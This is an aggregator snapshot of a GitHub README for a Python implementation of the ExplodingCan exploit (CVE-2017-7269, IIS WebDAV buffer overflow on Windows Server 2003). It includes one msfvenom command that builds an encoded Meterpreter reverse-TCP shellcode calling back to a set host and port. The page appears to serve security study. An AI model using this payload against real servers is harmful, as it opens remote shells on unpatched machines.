96
GitHub - danigargu/explodingcan: An implementation of NSA's ExplodingCan...
source link: https://github.com/danigargu/explodingcan
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
ExplodingCan
An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.
Details
- Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow
- CVE: CVE-2017-7269
- Disclosure date: March 31 2017
- Affected product: Microsoft Windows Server 2003 R2 SP2 x86
Months ago I needed to study this exploit, and finally I implemented it in python.
Shellcode
The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (metasploit) with the alpha_mixed encoder.
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode
Links
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK